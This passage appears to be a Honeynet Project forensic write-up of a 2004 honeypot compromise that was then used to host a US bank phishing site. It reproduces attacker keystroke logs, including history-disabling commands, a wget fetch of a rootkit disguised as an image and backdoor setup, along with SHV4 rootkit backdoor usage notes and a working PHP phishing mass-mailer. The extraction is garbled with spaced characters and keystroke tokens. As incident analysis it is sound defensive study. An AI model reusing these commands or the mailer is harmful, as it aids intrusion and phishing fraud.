e t B a n k i n g f i l e s / l o g o n . j s . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / s h o w D e m o . j s . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / s p a c e r . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / t o p _ n a v . g i f . / b a n k / p o p u p . h t m l . / b a n k / i n d e x . h t m

The attacker moved the new files into location in the web root and used the pico editor to change popup.html to point to a test server (http://69.24.XX.XX/testing.php). Again, this was possibly a previously compromised host or a system local to the attacker. Interestingly, because this FTP session was plain text and the attacker helpfully used the directory listing command, we can observe the attacker�s activities and also see what other tools they have stored in their FTP area. Directory listings are often very useful in providing further background detail during incident analysis:
2 2 0G o . r oM e m b e r sF T P U S E Rx x x x x x x x x 3 3 1P a s s w o r dr e q u i r e df o rp h i s e r . P A S Sx x x x x x x x x 2 3 0U s e rp h i s h e rl o g g e di n . S Y S T 2 1 5U N I XT y p e :L 8 P A S V 2 2 7E n t e r i n gP a s s i v eM o d e( 8 1 , 1 9 6 , X X X , X X X , 9 9 , 2 2 6 ) . L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o rf i l el i s t r w r r - 1f r e e w e b1 8 9 0J u n1 60 1 : 0 3D e s k t o p . z i p r w r r - 1f r e e w e b6 5 3 6J u l1 91 1 : 2 6S c r i s o r i . z i p r w r r - 1f r e e w e b2 7 8 8J u n1 61 8 : 2 9b l a 1 . t x t r w r r - 1f r e e w e b1 4 8 3 4J u n1 71 3 : 1 6e b a yo n l y r w r r - 1f r e e w e b2 4 7 1 2 7J u n1 41 9 : 5 8e m a i l e r 2 . z i p r w r r - 1f r e e w e b4 6 7 2 1 4J u n1 00 8 : 3 6e r o s . t g z r w r r - 1f r e e w e b4 1 7 4 9 4J u l1 82 2 : 2 7e x . t g z r w r r - 1f r e e w e b2 8 3 3J u l1 11 6 : 5 5f l i t . t g z r w r r - 1f r e e w e b7 5 1 7J u n1 11 1 : 5 3h t m l 1 . z i p r w r r - 1f r e e w e b1 0 3 8 3J u l 31 9 : 0 7i n d e x . h t m l r w r r - 1f r e e w e b4 1 3J u l1 82 2 : 0 9i n d e x . z i p d r w x r x r x 2f r e e w e b5 4J u l1 10 4 : 4 9l i s t z r w r r - 1f r e e w e b2 4 6 9 2 0J u n1 42 0 : 3 8m a s s m a i l . t g z r w r r - 1f r e e w e b8 1 9 2J u n1 20 7 : 1 8m a s s m a i l . z i p r w r r - 1f r e e w e b0J u n1 71 0 : 0 9n e p t u n . t g z r w r r - 1f r e e w e b3 1 0 1 3 2J u n1 10 9 : 2 5p a g i n a b u n a 1 . t g z r w r r - 1f r e e w e b5 4 8 1 8J u n1 82 3 : 2 4s c a m p a g e d e d a t 1 . z i p r w r r - 1f r e e w e b1 2 1 6 3J u n 90 1 : 3 1s e n d . p h p r w r r - 1f r e e w e b2 0 9 4J u n2 01 1 : 4 9s e n d s p a m A O L 1 . t g z r w r r - 1f r e e w e b2 1 7 3J u n1 42 2 : 5 8s e n d s p a m B U N 1 . t g z r w r r - 1f r e e w e b2 7 8 3J u n1 50 0 : 2 1s e n d s p a m B U N z i p 1 . z i p r w r r - 1f r e e w e b2 0 9 6J u n1 61 8 : 4 6s e n d s p a m N E W 1 . t g z r w r r - 1f r e e w e b5 7 4J u l1 10 1 : 0 8s e n d b a n k 1 . t g z r w r r - 1f r e e w e b3 2 3 8J u l1 82 3 : 0 7s e n d b a n k N E W . t g z r w r r - 1f r e e w e b6 4 4 4 3J u n1 10 2 : 3 3s p a m r w r r - 1f r e e w e b8 3 8 6 2J u n 90 9 : 5 6s p a m z . z i p d r w x r x r x 2f r e e w e b6 4J u l1 61 2 : 0 5s t u f f r w r r - 1f r e e w e b2 4 2 4J u l1 91 1 : 2 7s u n t r u s t . z i p

r w r r - 1f r e e r w r r - 1f r e e d r w x r x r x 2f r e e r w r r - 1f r e e r w r r - 1f r e e 2 2 6T r a n s f e rc o m p l e t e .

w e b3 6 4 4 1J u l1 80 0 : 5 2u s N E W . z i p w e b3 6 0 6 5J u l1 11 7 : 0 4b a n k 1 . t g z w e b4 9J u l1 61 2 : 2 6b a n k a w e b3 0 1 9 3 9J u n 81 3 : 1 7w w w 1 . t a r . g z w e b3 2 7 3 8 0J u n 71 6 : 2 4w w w 1 . z i p

C W Db a n k a 2 5 0C W Dc o m m a n ds u c c e s s f u l . P A S V 2 2 7E n t e r i n gP a s s i v eM o d e( 8 1 , 1 9 6 , X X X , X X X , 1 1 5 , 1 5 1 ) . L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o rf i l el i s t r w r r - 1f r e e w e b1 7 6 5J u l 31 8 : 2 5c h e c k . p h p r w r r - 1f r e e w e b3 9 9 8 8J u l 31 8 : 2 5b a n k . z i p r w r r - 1f r e e w e b4 0 1 5 2J u l1 61 2 : 2 6b a n k a . z i p 2 2 6T r a n s f e rc o m p l e t e . C W D. . 2 5 0C W Dc o m m a n ds u c c e s s f u l . P A S V 2 2 7E n t e r i n gP a s s i v eM o d e( 8 1 , 1 9 6 , X X X , X X X , 1 3 3 , 1 9 7 ) . L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o rf i l el i s t r w r r - 1f r e e w e b1 8 9 0J u n1 60 1 : 0 3D e s k t o p . z i p r w r r - 1f r e e w e b6 5 3 6J u l1 91 1 : 2 6S c r i s o r i . z i p r w r r - 1f r e e w e b2 7 8 8J u n1 61 8 : 2 9b l a 1 . t x t r w r r - 1f r e e w e b1 4 8 3 4J u n1 71 3 : 1 6e b a yo n l y r w r r - 1f r e e w e b2 4 7 1 2 7J u n1 41 9 : 5 8e m a i l e r 2 . z i p r w r r - 1f r e e w e b4 6 7 2 1 4J u n1 00 8 : 3 6e r o s . t g z r w r r - 1f r e e w e b4 1 7 4 9 4J u l1 82 2 : 2 7e x . t g z r w r r - 1f r e e w e b2 8 3 3J u l1 11 6 : 5 5f l i t . t g z r w r r - 1f r e e w e b7 5 1 7J u n1 11 1 : 5 3h t m l 1 . z i p r w r r - 1f r e e w e b1 0 3 8 3J u l 31 9 : 0 7i n d e x . h t m l r w r r - 1f r e e w e b4 1 3J u l1 82 2 : 0 9i n d e x . z i p d r w x r x r x 2f r e e w e b5 4J u l1 10 4 : 4 9l i s t z r w r r - 1f r e e w e b2 4 6 9 2 0J u n1 42 0 : 3 8m a s s m a i l . t g z r w r r - 1f r e e w e b8 1 9 2J u n1 20 7 : 1 8m a s s m a i l . z i p r w r r - 1f r e e w e b0J u n1 71 0 : 0 9n e p t u n . t g z r w r r - 1f r e e w e b3 1 0 1 3 2J u n1 10 9 : 2 5p a g i n a b u n a 1 . t g z r w r r - 1f r e e w e b5 4 8 1 8J u n1 82 3 : 2 4s c a m p a g e d e d a t 1 . z i p r w r r - 1f r e e w e b1 2 1 6 3J u n 90 1 : 3 1s e n d . p h p r w r r - 1f r e e w e b2 0 9 4J u n2 01 1 : 4 9s e n d s p a m A O L 1 . t g z r w r r - 1f r e e w e b2 1 7 3J u n1 42 2 : 5 8s e n d s p a m B U N 1 . t g z r w r r - 1f r e e w e b2 7 8 3J u n1 50 0 : 2 1s e n d s p a m B U N z i p 1 . z i p r w r r - 1f r e e w e b2 0 9 6J u n1 61 8 : 4 6s e n d s p a m N E W 1 . t g z r w r r - 1f r e e w e b1 5 7 4J u l1 10 1 : 0 8s e n d b a n k 1 . t g z r w r r - 1f r e e w e b2 2 3 8J u l1 82 3 : 0 7s e n d b a n k N E W . t g z r w r r - 1f r e e w e b6 4 4 4 3J u n1 10 2 : 3 3s p a m r w r r - 1f r e e w e b8 3 8 6 2J u n 90 9 : 5 6s p a m z . z i p d r w x r x r x 2f r e e w e b6 4J u l1 61 2 : 0 5s t u f f r w r r - 1f r e e w e b2 4 2 4J u l1 91 1 : 2 7s u n t r u s t . z i p r w r r - 1f r e e w e b3 6 4 4 1J u l1 80 0 : 5 2u s N E W . z i p r w r r - 1f r e e w e b3 6 0 6 5J u l1 11 7 : 0 4b a n k 1 . t g z d r w x r x r x 2f r e e w e b4 9J u l1 61 2 : 2 6b a n k a r w r r - 1f r e e w e b3 0 1 9 3 9J u n 81 3 : 1 7w w w 1 . t a r . g z r w r r - 1f r e e w e b3 2 7 3 8 0J u n 71 6 : 2 4w w w 1 . z i p 2 2 6T r a n s f e rc o m p l e t e . T Y P EI 2 0 0T y p es e tt oI P A S V 2 2 7E n t e r i n gP a s s i v eM o d e( 8 1 , 1 9 6 , X X X , X X X , 1 1 3 , 8 6 ) . R E T Rb a n k 1 . t g z 1 5 0O p e n i n gB I N A R Ym o d ed a t ac o n n e c t i o nf o rb a n k 1 . t g z( 3 6 0 6 5b y t e s ) 2 2 6T r a n s f e rc o m p l e t e . Q U I T 2 2 1G o o d b y e .

The contents of this FTP server home directory suggests that the phisher is heavily involved in spam and phishing activities, with pre-built content and message delivery tools targeting many well known online brands stored on this server. Based on this captured session, this phishing activity is not likely to be an isolated incident. The third file downloaded was sendbankNEW.tgz from the Romain FTP server host2.go.ro.
#m d 5 s u ms e n d b a n k N E W . t g z f 3 8 b d 5 4 9 6 b 5 1 8 8 1 e e 6 d 1 3 a a 6 f 4 1 c d 1 5 6 #f i l es e n d b a n k N E W . t g z s e n d b a n k N E W . t g z g z i pc o m p r e s s e dd a t a ,f r o mU n i x

The file was a valid archive and contained the following files:
t o t a l2 0 r w r r r w r r r w r r r w r w r w 11 0 0 21 0 0 2 7 2 4N o v 4 2 0 0 3i n i . i n c 11 0 0 21 0 0 2 1 0 1J u n1 42 3 : 4 4l i s t . t x t 11 0 0 21 0 0 2 6 0 7J u l1 71 4 : 2 1b a n k . p h p 1r o o tr o o t7 5 6 4J u l1 90 0 : 0 4b l a . t x t

The purpose of each file is listed in the table below: File ini.inc Contents and purpose Spam sending configuration

list.txt

This file contained a list of 5 email addresses to send spam email to. Because of the limited size and Romanian email addresses linked to the attacker, this was presumably the email addresses of fellow gang members and not a real phishing attack

bank.php A simple PHP script to read the contents of a text file (bla.txt) and email it to each recipient in an input file (list.txt)

The email lure blah.txt was notable for having good grammar and spelling, legalise at the bottom about "Equal Opportunity Lending" and heavy use of files linked directly from the official web site of the targeted bank, all of which help it to appear more realistic. One ironic point to note is that the email even included an exhortation to not provide passwords to fraudulent web sites, or to ever email your password to a third party! The bank.php mass emailing script to send spam advertising this particular phishing scam is shown below:
< ? p h p i n c l u d e ( " i n i . i n c " ) ; $ m a i l _ h e a d e r =" F r o m : X X X X X X X X X < r e s t o r e @ t a r g e t b a n k . c o m > \ n " ; $ m a i l _ h e a d e r. =" C o n t e n t T y p e :t e x t / h t m l \ n " ; $ s u b j e c t = " I na t t e n t i o no fT a r g e tB a n kM e m b e r s!R e s t o r eY o u rA c c o u n tN o w ! " ; $ b o d y = l o a d i n i ( " b l a . t x t " ) ; i f( ! ( $ f p=f o p e n ( " l i s t . t x t " ," r " ) ) ) e x i t ( " U n a b l et o o p e n$ l i s t F i l e . " ) ; $ i = 0 ; p r i n t" S t a r tt i m ei s" ;p r i n td a t e ( " Y : m : dH : i " ) ;p r i n t " \ n " ; w h i l e( ! f e o f ( $ f p ) ){ f s c a n f ( $ f p ," % s " ,$ n a m e ) ; $ i + + ; m a i l ( $ n a m e ,$ s u b j e c t ,$ b o d y ,$ m a i l _ h e a d e r ) ; } p r i n t" E n dt i m ei s" ;p r i n td a t e ( " Y : m : d H : i " ) ;p r i n t" \ n " ; p r i n t" $ i " ;p r i n t" e m a i l ss e n t . " ;p r i n t " \ n " ; ? >

Although simple, it is functional and could easily have been used to send many more messages than the 5 test messages sent from the honeynet. The honeynet architecture would have restricted outbound emails, but the honeypot was taken offline for forensic analysis before any bulk spam email could be sent by the attacker.

Timeline
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed timeline only covers the activity relevant to the phishing attack. Detailed timeline: 18/07/04 - 12:30. First the attacker exploits a buffer overflow in the samba server on the Redhat Linux 7.3 honeypot, as can be seen from the snort alerts shown below:
[ * * ][ 1 : 2 1 0 3 : 9 ]N E T B I O SS M Bt r a n s 2 o p e nb u f f e ro v e r f l o wa t t e m p t[ * * ] [ C l a s s i f i c a t i o n :A t t e m p t e dA d m i n i s t r a t o rP r i v i l e g eG a i n ][ P r i o r i t y :1 ] 0 7 / 1 8 1 2 : 3 0 : 3 7 . 8 1 6 0 5 76 9 . 4 4 . X X X . X X X : 4 7 9 3 8>1 0 . 2 . 2 . 1 2 0 : 1 3 9 T C PT T L : 5 3T O S : 0 x 0I D : 2 9 6 5 8I p L e n : 2 0D g m L e n : 1 5 0 0D F * * * A * * * *S e q :0 x 4 7 6 A C 1 E 0A c k :0 x 2 E 2 4 9 7 0 7 & n b s p ;W i n :0 x B 6 8T c p L e n :3 2 T C PO p t i o n s( 3 )= >N O PN O PT S :2 1 4 0 2 0 8 2 06 0 6 2 6 1 7 [ X r e f = >< ah r e f = " h t t p : / / w w w . d i g i t a l d e f e n s e . n e t / l a b s / a d v i s o r i e s / D D I 1 0 1 3 . t x t " > h t t p : / / w w w . d i g i t a l d e f e n s e . n e t / l a b s / a d v i s o r i e s / D D I 1 0 1 3 . t x t < / a > ] [ X r e f= >< ah r e f = " h t t p : / / c v e . m i t r e . o r g / c g i b i n / c v e n a m e . c g i ? n a m e = 2 0 0 3 0 2 0 1 " > h t t p : / / c v e . m i t r e . o r g / c g i b i n / c v e n a m e . c g i ? n a m e = 2 0 0 3 0 2 0 1 < / a > ] [ X r e f = >< ah r e f = " h t t p : / / w w w . s e c u r i t y f o c u s . c o m / b i d / 7 2 9 4 " > h t t p : / / w w w . s e c u r i t y f o c u s . c o m / b i d / 7 2 9 4 < / a > ] [ * * ][ 1 : 6 4 8 : 7 ]S H E L L C O D Ex 8 6N O O P[ * * ] [ C l a s s i f i c a t i o n :E x e c u t a b l ec o d ew a sd e t e c t e d ][ P r i o r i t y :1 ] 0 7 / 1 8 1 2 : 3 0 : 3 7 . 8 1 7 4 2 26 9 . 4 4 . X X X . X X X : 4 7 9 3 8& g t ;1 0 . 2 . 2 . 1 2 0 : 1 3 9 T C PT T L : 5 3T O S : 0 x 0I D : 2 9 6 5 9I p L e n : 2 0D g m L e n : 1 5 0 0D F * * * A P * * *S e q :0 x 4 7 6 A C 7 8 8A c k :0 x 2 E 2 4 9 7 0 7 & n b s p ;W i n :0 x B 6 8T c p L e n :3 2 T C PO p t i o n s( 3 )= & g t ;N O PN O PT S :2 1 4 0 2 0 8 2 06 0 6 2 6 1 7 [ X r e f= & g t ;< ah r e f = " h t t p : / / w w w . w h i t e h a t s . c o m / i n f o / I D S 1 8 1 " > h t t p : / / w w w . w h i t e h a t s . c o m / i n f o / I D S 1 8 1 < / a > ]

18/07/04 - 12:30. After a few retries with different offsets, the samba exploit (CAN-2003-0201) succeeds and returns a root prompt to the attacker, as show by the snort alert below:
[ * * ][ 1 : 4 9 8 : 6 ]A T T A C K R E S P O N S E Si dc h e c kr e t u r n e dr o o t[ * * ] [ C l a s s i f i c a t i o n :P o t e n t i a l l yB a dT r a f f i c ][ P r i o r i t y :2 ] 0 7 / 1 8 1 2 : 3 0 : 5 5 . 5 1 1 1 8 21 0 . 2 . 2 . 1 2 0 : 4 5 2 9 5>6 9 . 4 4 . X X X . X X X : 4 8 2 8 3 T C PT T L : 6 4T O S : 0 x 0I D : 5 6 4 6 8I p L e n : 2 0D g m L e n : 1 4 0D F * * * A P * * *S e q :0 x 2 E 1 F 5 F B EA c k :0 x 4 7 D 4 2 6 D 5 & n b s p ;W i n :0 x 1 6 A 0T c p L e n :3 2 T C PO p t i o n s( 3 )= >N O PN O PT S :6 0 6 4 3 9 52 1 4 0 2 2 5 8 9

18/07/04 - 12:30. After gaining root access, the attacker check who they are and who else is logged into the system before attempting to hide their activities by turning off shell history logging. The Sebek keystrokes for this session are shown below:
[ 2 0 0 4 0 7 1 81 2 : 3 0 : 5 51 0 . 2 . 2 . 1 2 01 1 6 7 5s h0 ] u n s e tH I S T F I L E ;e c h o" # # #0 w n e dt h i ss e r v e r# # # " ; u n a m ea ; i d ; u p t i m e ; c a [ 2 0 0 4 0 7 1 81 2 : 3 0 : 5 51 0 . 2 . 2 . 1 2 01 1 6 7 5s h0 ] s u [ 2 0 0 4 0 7 1 81 2 : 3 0 : 5 91 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] u n s e tH I S T F I L E [ 2 0 0 4 0 7 1 81 2 : 3 1 : 0 11 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] u n s e tH I S T S A V E [ 2 0 0 4 0 7 1 81 2 : 3 1 : 0 31 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] u n s e tH I S T L O G

18/07/04 - 12:31. The attacker then proceeds to downloading what appears to be an image file from a remote web server using the wget command line HTTP client:

[ 2 0 0 4 0 7 1 81 2 : 3 1 : 0 61 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] m k d i r/ d e v / h p d [ 2 0 0 4 0 7 1 81 2 : 3 1 : 0 81 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] c d/ d e v / h p d [ 2 0 0 4 0 7 1 81 2 : 3 1 : 0 91 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] i d [ 2 0 0 4 0 7 1 81 2 : 3 1 : 1 01 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] w [ 2 0 0 4 0 7 1 81 2 : 3 1 : 1 71 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] w g e th o s t 1 . 3 x . r o / s h v 4 . j p g

18/07/04 - 12:32. The attacker unpacks the image file, which is actually a gziped tar archive, before extracting and running a setup program:
[ 2 0 0 4 0 7 1 81 2 : 3 2 : 2 11 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] t a rz x v fs h v 4 . j p g;r mr fs h v 4 . j p g [ 2 0 0 4 0 7 1 81 2 : 3 2 : 2 31 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] c ds h v 4 [ 2 0 0 4 0 7 1 81 2 : 3 2 : 2 81 0 . 2 . 2 . 1 2 01 1 8 5 1b a s h0 ] . / s e t u pa d m i n2 2 7 7

The attackers view of this session can be found here. Analysis showed that the malware installed was the SHV4 root kit, previously the subject of the Honeynet Projects Scan of the Month challenge 29. From the SHV4 root kit source code, we can determine what the setup command does:
#U S A G E : #. / s e t u pp a s sp o r t # #S S H Db a c k d o o r :s s hlr o o tpp o r th o s t n a m e #w h e np r o m p t e df o rp a s s w o r de n t e ry o u rr o o t k i tp a s s w o r d #l o g i nb a c k d o o r :D I S P L A Y = p a s s & n b s p ; ;e x p o r tD I S P L A Y & n b s p ; ;t e l n e tv i c t i m #t y p ea n y t h i n ga tl o g i n ,a n dt y p ea r ff o rp a s sa n db 0 0 mr 0 0 t # #i fug 3 tc o u g h td 0 n tb l a i mu s & n b s p ; ! !

The attacker has installed and configured an encrypted backdoor on the honeypot, bound to TCP port 2277. A large amount of other activity occurs on the system over the next few 12-72 hours, including installation of PsyBNC IRC servers by a Romanian group, installation and usage of the mole and mazz mass scanners (probably the autorooter used to compromise this honeypot), installation and re-installation of other rootkits, password sniffing and various other activities not relevant to the main phishing attack. 23/07/04 - 21:11. The attacker returns from 192.226.XXX.XXX (a Windows 2000 or Windows XP PC in Ontario) via the SSH backdoor listening on TCP port 2277 and checks if the server is still active and who is logged in:
[ 2 0 0 4 0 7 2 32 1 : 1 1 : 5 8x n t p s0 ] S S H 1 . 5 P u T T Y R e l e a s e 0 . 5 2 [ 2 0 0 4 0 7 2 32 1 : 1 2 : 3 9b a s h0 ] d i s c o v e r y [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] w [ 2 0 0 4 0 7 2 32 1 : 1 2 : 4 4b a s h0 ] u n s e tH I S T F I L E [ 2 0 0 4 0 7 2 32 1 : 1 2 : 4 6b a s h0 ] u n s e tH I S T S A V E

23/07/04 - 21:13. The attacker reconnects, prepares a directory in the Apache web server's document root and then downloads some pre-built web content from a Romanian web server using, again using wget, before checking the honeypot's IP address and PHP configuration:
[ 2 0 0 4 0 7 2 32 1 : 1 3 : 0 61 0 . 2 . 2 . 1 2 01 6 9 8 4x n t p s0 ] S S H 1 . 5 P u T T Y R e l e a s e 0 . 5 4 [ 2 0 0 4 0 7 2 32 1 : 1 3 : 2 61 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] u n s e tH I S T F I L E [ 2 0 0 4 0 7 2 32 1 : 1 3 : 2 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] c d/ v a r / w w w [ 2 0 0 4 0 7 2 32 1 : 1 3 : 2 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 3 : 3 01 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l sa [ 2 0 0 4 0 7 2 32 1 : 1 3 : 3 51 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] c dh t m l [ 2 0 0 4 0 7 2 32 1 : 1 3 : 3 51 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l sa [ 2 0 0 4 0 7 2 32 1 : 1 3 : 5 21 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] m k [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] m k d i r. i n t e r n e t B a n k i n g L o g o n [ 2 0 0 4 0 7 2 32 1 : 1 3 : 5 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] c d[ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] l s [ 2 0 0 4 0 7 2 32 1 : 1 4 : 4 31 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] w g e th o s t 2 . g o . r o / b a n k / b a n k . z i p

23/07/04 - 21:15. The attacker attempts to extract the contents of the zip file but finds it is corrupt and deletes it.
[ 2 0 0 4 0 7 2 32 1 : 1 5 : 2 31 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] t a rx z v fb a [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] u n z i pb a n k . z i p [ 2 0 0 4 0 7 2 32 1 : 1 5 : 2 61 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l sa [ 2 0 0 4 0 7 2 32 1 : 1 5 : 3 61 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] t a rx z v fb a n k . z i p [ 2 0 0 4 0 7 2 32 1 : 1 5 : 4 21 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] r mr fb a n k . z i p

23/07/04 - 21:16. The attacker changes tools and gets another file using FTP, again from the same web server in Romania, which does extract successfully this time:
[ 2 0 0 4 0 7 2 32 1 : 1 5 : 5 31 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] f t ph o s t 2 . g o . r o [ 2 0 0 4 0 7 2 32 1 : 1 6 : 0 51 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] h a s h [ 2 0 0 4 0 7 2 32 1 : 1 6 : 0 61 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 6 : 0 91 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] c db a n k [ 2 0 0 4 0 7 2 32 1 : 1 6 : 0 91 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 6 : 1 31 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] c d. . [ 2 0 0 4 0 7 2 32 1 : 1 6 : 1 41 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 6 : 4 01 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] g e tb a n k 1 . t g z [ 2 0 0 4 0 7 2 32 1 : 1 6 : 4 51 0 . 2 . 2 . 1 2 01 7 0 4 4f t p0 ] b y e [ 2 0 0 4 0 7 2 32 1 : 1 6 : 4 61 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 6 : 5 21 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] t a rx z v fb a n k 1 . t g z [ 2 0 0 4 0 7 2 32 1 : 1 6 : 5 41 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 7 : 0 31 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] r mr fb a n k 1 [ 2 0 0 4 0 7 2 32 1 : 1 7 : 0 41 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 7 : 1 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] m vb a n k. i n t e r n e t B a n k i n g L o g o n [ 2 0 0 4 0 7 2 32 1 : 1 7 : 2 01 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s

23/07/04 - 21:17. The attacker edits the extracted web content and updates the HTML to point to a testing PHP script on a remote web server:
[ 2 0 0 4 0 7 2 32 1 : 1 7 : 2 31 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] c d. i n t e r n e t B a n k i n g L o g o n [ 2 0 0 4 0 7 2 32 1 : 1 7 : 2 41 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] l s [ 2 0 0 4 0 7 2 32 1 : 1 7 : 2 91 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] p i c o [ 2 0 0 4 0 7 2 32 1 : 1 7 : 4 41 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] p i c op o p u p . h t m [ 2 0 0 4 0 7 2 32 1 : 1 7 : 4 81 0 . 2 . 2 . 1 2 01 7 0 5 8p i c o0 ] [ U A R R O W ] l [ 2 0 0 4 0 7 2 32 1 : 1 8 : 4 11 0 . 2 . 2 . 1 2 01 6 9 8 6b a s h0 ] p i c op o p u p . h t m l [ 2 0 0 4 0 7 2 32 1 : 1 9 : 0 41 0 . 2 . 2 . 1 2 01 7 0 6 0p i c o0 ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ]

[ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] [ D A R R O W ] p h p [ 2 0 0 4 0 7 2 32 1 : 1 9 : 1 71 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] t e l b n e t [ 2 0 0 4 0 7 2 32 1 : 1 9 : 1 91 0 . 2 . 2 . 1 2 01 6 9 3 6b a s h0 ] [ 2 0 0 4 0 7 2 32 1 : 2 2 : 1 91 0 . 2 . 2 . 1 2 01 7 0 6 0p i c o0 ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ L A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ R A R R O W ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] 